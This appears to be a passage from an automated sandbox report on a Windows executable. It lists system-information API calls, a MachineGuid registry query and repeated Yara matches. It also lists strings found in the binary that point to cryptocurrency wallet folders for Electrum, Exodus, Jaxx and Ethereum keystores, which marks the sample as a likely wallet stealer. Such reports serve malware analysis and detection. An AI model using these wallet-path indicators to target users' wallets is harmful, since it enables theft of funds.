0_2_00417216 |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: GetLocaleInfoA, |
0_2_00404BA8 |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid |
Jump to behavior |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_00404C71 GetCommandLineA,GetVersion,GetVersion,GetThreadLocale,GetThreadLocale,GetCurrentThreadId, |
0_2_00404C71 |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_004065F0 GetUserNameW, |
0_2_004065F0 |
Source: Yara match |
File source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.4b0000.2.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.400000.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.400000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.4b0000.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.480000.1.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.480000.1.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000002.544424238.0000000000480000.00000040.00000001.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000002.544452351.00000000004B0000.00000004.00000001.sdmp, type: MEMORY |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_004186C4 |
0_2_004186C4 |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_004186C4 |
0_2_004186C4 |
Source: Yara match |
File source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.4b0000.2.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.400000.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.400000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.4b0000.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.480000.1.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.480000.1.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000002.544424238.0000000000480000.00000040.00000001.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000002.544452351.00000000004B0000.00000004.00000001.sdmp, type: MEMORY |
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
String found in binary or memory: electrum.dat |
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
String found in binary or memory: %appdata%\Electrum\wallets\ |
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
String found in binary or memory: %APPDATA%\Jaxx\Local Storage\ |
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
String found in binary or memory: %APPDATA%\Exodus\ |
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
String found in binary or memory: %APPDATA%\Jaxx\Local Storage\ |
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
String found in binary or memory: %APPDATA%\Ethereum\keystore\ |
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
String found in binary or memory: %APPDATA%\Exodus\ |
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
String found in binary or memory: %APPDATA%\Ethereum\keystore\ |
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
String found in binary or memory: %APPDATA%\Ethereum\keystore\ |
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
String found in binary or memory: %appdata%\Electrum-LTC\wallets\ |